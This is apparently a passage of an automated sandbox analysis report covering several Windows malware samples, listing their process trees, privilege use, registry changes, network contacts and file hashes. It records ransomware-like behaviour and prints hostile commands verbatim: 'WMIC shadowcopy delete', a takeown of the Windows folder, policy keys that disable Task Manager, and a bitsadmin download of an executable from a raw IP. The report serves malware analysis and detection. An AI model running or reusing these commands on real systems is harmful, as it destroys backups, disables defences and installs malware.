| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\LETTHEAD.XML | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD09194_.WMF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00938_.WMF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0299587.WMF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_h.png | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_down_BIDI.png | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\APIFile_8.ico | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\EN00006_.WMF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\INTLDATE.DLL | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02158_.WMF | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\takeown.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\T1.exe | N/A |
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\T1.exe
"C:\Users\Admin\AppData\Local\Temp\T1.exe"
C:\Windows\SysWOW64\wbem\WMIC.exe
"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c takeown /f C:\Windows\"."
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\"."
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HIT BY RANSOMWARE.txt
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | mail.gmx.net | udp |
| DE | 212.227.17.190:587 | mail.gmx.net | tcp |
Files
memory/2112-0-0x000000007463E000-0x000000007463F000-memory.dmp
memory/2112-1-0x0000000000F30000-0x0000000000F3E000-memory.dmp
memory/2112-2-0x0000000074630000-0x0000000074D1E000-memory.dmp
memory/2112-20-0x000000007463E000-0x000000007463F000-memory.dmp
memory/2112-125-0x0000000074630000-0x0000000074D1E000-memory.dmp
C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\DEEPBLUE\PREVIEW.GIF.happy
| MD5 | 1d31df3829f4c22e15d48faa61679175 |
| SHA1 | a2f40741e4b38319c0993b6842a315d548ea8e53 |
| SHA256 | c784a7c3216a8af2ffd71a4b8ed7e50c02f2fdfd76f6584e9fe2f8d8be92bd24 |
| SHA512 | 32ac9fad436c872825cb07baa13c1dda3d638ca6ff128de18f3ce22e99d6603ab690d3d2bb63a33294d76c45a13af81cf48766128c7586332cd3dfaf52c4945d |
C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00118_.WMF.happy
| MD5 | 24064cc0a264eabc08db1141c9fd5c3f |
| SHA1 | 6d1997210190df3bcb16d264f6276d0f7eadc4ef |
| SHA256 | 20dd983374512b42431442e956a8e7b558c15a2559dc46fa477f3b0dee4ef37d |
| SHA512 | 42db5e568e27b31d64a98478313fd3fc275d409bddeb22da6c4a52366c5e987b0b29a67315d3e4633c58e251b2f5b1cc513c318183fd69f840c692afc5ccaa98 |
C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14828_.GIF.happy
| MD5 | 392e471e1334f2e42ed0e311f769cdd8 |
| SHA1 | 4cccd75b55a817606cc79138b01d351f82e34780 |
| SHA256 | d93bb0ba05f1986ecfe6037db60c7d9e3d0655f9c0e31b877db4c3056dd062f7 |
| SHA512 | 8e315b82dc14a298cb73e287e0b346e480de3f6e277a8fd9b953dc6456416ccfe7ea13323fad27360d27621ead2f669dd053d54907bb50b3d5a8c68dc11dc7bd |
C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21299_.GIF.happy
| MD5 | b8e7100f81d47b3368d1dcd3a703f9a1 |
| SHA1 | c244f6dce97b9d619cf61d473da31abf604a87cb |
| SHA256 | 6a59cab4bcf3aa37263c176207fb2809ab98bbe1c33c9123f9a18209d6e8979e |
| SHA512 | 8cd7db7af1a8ca6aab263770aca9843aca45b9d19b4d4b49cac8594eba3e178e00b013b8bf912d64fe8b908e7c9bd2bcf90078c44e7247e45d0ebcff70b79b0f |
C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115843.GIF.happy
| MD5 | e26eab69fd7c3b7953c34ad85197ebac |
| SHA1 | a60bd5acde6b26a26520bf8950700f8dcd7b74e6 |
| SHA256 | f5028b6c61015cc1639fed785e3c6432080dfb6a9be9a2c0be3edca304702e19 |
| SHA512 | 88252580a546f96df185b300565ebcb7c63d2ed7c5c48197a2f8e82bbc00507449a5eb0cefc545c73dc15540a80e957eb8c9155324e5bd21cdf27055d484777e |
C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.HK.XML.happy
| MD5 | f642ee90f1e5015e7ef8f9b32210b9c6 |
| SHA1 | 2b965629f2a559338e9affcd304db5c26d22359b |
| SHA256 | 997403e2c520ce18d0c58797972506776f94f6c3d282739b2b885f35471839fa |
| SHA512 | 52bc40ecb1fb7d23be7bb710bac8738740056d60b30ab3cb5f35c333b8cb0bad4b1a67100913d5a17019404d95a0cb2240ca825be939590031300e802ab6bf9e |
C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.PL.XML.happy
| MD5 | ff375d9347491474f2c500f036751f2a |
| SHA1 | 6491d3091e6ec928cb43c4053443ef4ff9403528 |
| SHA256 | d4398c68525a3fae713194500851137670d3763f8cd61d027e274becdc058e17 |
| SHA512 | f3773d8d7f314f1e381e5a9b3504049ad4e9cc2248ea700d509aaf8d8efd2e8b19ce72e2185042c5ff072eceb170dd9c09bf2301e1691003db0a8736c5bafb68 |
C:\Users\Admin\Desktop\HIT BY RANSOMWARE.txt
| MD5 | 67d1f04285eaabb5ef21969a6295b71f |
| SHA1 | c253031dfa0c6aaf1a72fe31f50ae2937f384461 |
| SHA256 | 6b94bc6ca76970e518a1341cce2c2842c965566b16389f4419d592bece446610 |
| SHA512 | 2daf82cbc21d2837a35dab4ad48b95cea8a65719503750e93fd671bea100ab2aa9236e907e3a6615f890f020a91b019b8b2296565cc194d67c12f0f60ac95038 |
Analysis: behavioral32
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240903-en
Max time kernel
117s
Max time network
120s
Command Line
Signatures
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2480 wrote to memory of 2468 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bitsadmin.exe |
| PID 2480 wrote to memory of 2468 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bitsadmin.exe |
| PID 2480 wrote to memory of 2468 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\bitsadmin.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\verhdiehndi.bat"
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer myjob /download /priority high http://185.141.25.185/software.exe "C:\Users\Admin\AppData\Roaming\freegaza_israeli_killers.exe"
Network
| Country | Destination | Domain | Proto |
| AE | 185.141.25.185:80 | tcp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240903-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.MalwareScanner1.exe
"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.MalwareScanner1.exe"
Network
Files
memory/2500-0-0x000007FEF5EC3000-0x000007FEF5EC4000-memory.dmp
memory/2500-1-0x00000000000D0000-0x00000000000F8000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240903-en
Max time kernel
251s
Max time network
187s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\sidacertification.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "438408702" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{878B9261-A883-11EF-869D-46BBF83CD43C} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Temp\sidacertification.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\sidacertification.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\sidacertification.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\sidacertification.exe
"C:\Users\Admin\AppData\Local\Temp\sidacertification.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2304 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.bing.com | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
memory/2508-0-0x0000000000220000-0x0000000000221000-memory.dmp
memory/2508-15-0x0000000000220000-0x0000000000221000-memory.dmp
memory/2508-14-0x0000000000400000-0x000000000050B000-memory.dmp
memory/2508-21-0x0000000000400000-0x000000000050B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab98E8.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar9978.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e11b84ac98958b66515181f50e633a1b |
| SHA1 | 602086d3a42003016ab52eeb4b4e88b2d22cfa77 |
| SHA256 | 88b19e8a14ada53690165ca058f3f4f36bdb56f11a3fcb69d4b4daf46dcc32b6 |
| SHA512 | ed72f3622f9c2e89b087412d82d6206a9f2e2ea3be34619b0f66a11c2f1959b6cf39ba29e4cd9d23d7d2bf88e8b89829f9d9596df0ecf277e9f67eac7b0c033b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c98f59c4641032103406e2868f1a2de8 |
| SHA1 | a5acff05c6e3193ded7be820678af476cb5bd888 |
| SHA256 | c3077172ab065371b0e2a7bf74e05f063525bc147dfab188decd4bec72483bb3 |
| SHA512 | 300a8ce8a24c894ca508e451e7d62045fea99fd4794c77d0cf7ac6607f2a1156b3746ef51d5bb28b8f39801f041ae08389907dc611ebaac2fadd8f626366b63e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2e09b16b9b3a6d5e406ec8a4c0a97664 |
| SHA1 | e74ed55b440768dc06d98b89106142768e11182a |
| SHA256 | 0bf433baa5e995c8a2614a6bcd06dbbce796a80f03682ea4753be5d26b8d1f1c |
| SHA512 | c509192ae143b445d8047e3d084a3405ca2aefc6b9c556d8f3ca06229f3068fb705673c3339441fdfa5031627fa1e61d7b1af58f37e298c9b6d5c3b2b16bd8f4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 65961613449d696376cff8cb2a617599 |
| SHA1 | 28064e64da49086f96869fa01bae93c028cfb90f |
| SHA256 | bc41045b5975ad38bd6960b6d0ec32f534a34d0339d353961031554c9e20bf25 |
| SHA512 | 7964b18738dd900861bacbcb4ffc86ac4545978ac5515b2fafd707ede2abd8f8fc3a7243bc7659c63469450975bc93ac9a269d77ba5d15fd4a91c59bdaf8f8e5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4c9ed35b030a354912e3e2965325bde0 |
| SHA1 | ebaf6d8eb3ac2db73acbcf9ad451f5711caa8400 |
| SHA256 | 36acdbce60bf6159037c26263ec6d89bea786c2c11b3a6eb0177fd142dab118a |
| SHA512 | d69eaca0ef5aec5ff75a3f503d9c3926e3ad249bafb35a849f34ae4019dfbe7696fc23b749a597e4bf9129186fd2cbd2f28dd987212b637b355204efbf8ef74a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0e084c441909734579c104be7264b972 |
| SHA1 | 0df61faace8cfefcd778d9db6d8c29e9be3af0c3 |
| SHA256 | 0215b9d4ea1ccf5749bbd61ec9a2e6bea23e1c6f33e8fed60576157fd30f17f7 |
| SHA512 | 61e1e38a54807a87f675ec1e85af588bef68bef6201bc04373157cd6469f8466e6a711a6161bd77665d9e14b3b808d12bb562fa46c4ed28cc8c9a2685eda972d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | dad7ab00e93d96c43e7b726361f3ef26 |
| SHA1 | 49131dd990e94dd365acc8df3e293548088b9509 |
| SHA256 | 78f32dd6ce2b01a5121db2d4c32b0e4539c23f50e049210c5adebce36cbd896a |
| SHA512 | 30f7f59444982d11dbf263617f0da2102e7532f6b072bc51a5fd235c789f925322624838cd5fcd9e460f4ad7c9dcf674c7ecd826b46739236517f3cbeb67f959 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f123b44725d7d941db61902aa198e894 |
| SHA1 | cadeb00a1c809a161f2d0a1bd1c036b57cf1380f |
| SHA256 | 5d1be7f002ab837e62fac50658db07b290212df7498dfe3992470aa1a9002393 |
| SHA512 | ed915060ff1ce2ce130aa0446dff5fff18504437f01c3ab7591f3a59f9442999020651538892ada770ede75c227cac262f1840261ce0226573472b26cda77172 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c5c2c310fc155817af1a9c673a5268d2 |
| SHA1 | c13d73b08c6e290e56d65dda2282a2dba70c9fec |
| SHA256 | efc753e725ec3a3776e0385c1723d09925f3686b3d3278952abfcc7c006ceb53 |
| SHA512 | 17e3796cb9b21e883ed0c5c30bb2fafd4cef7191fbe5eaa47112207408a8069050ba77d310fc578f2db50175f98ab2b74c6e64ffe319f160fcb9e653bbf4db69 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9fa2c6ac32e37a494df95040ddc32fe1 |
| SHA1 | 8bcc0c5c68c55c82925429c8a2fe56763de6d74e |
| SHA256 | 83c6a9f8d112cf27e4f2b986f31f46b522e400998b738edbdf70156074346c16 |
| SHA512 | 8cc52f00b08cb9a96bc0c8de47eb6b300dad63c64a5055ab1a0cf22464c50d47228b9de35415e114aaa6fb57ea4afa4e67f0b31615d0c7ec141b95765e16c612 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e2f6ea44cdffe394168c0f9faeb62f14 |
| SHA1 | 09cdd8ad74fc5708c38d5251c1d496a9f3b0479d |
| SHA256 | c86232483ab98c0102b486fd32e8b77a3a530a146309ce7d2581914736fdf641 |
| SHA512 | 3e4f8962cd30b3b81f75afd03becf27cb46fe6884d731ecd7c8693ee33a913ded271d85ef2327cd277a7eda1e6ba5de4839b36fe6eaa755539117636961021be |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
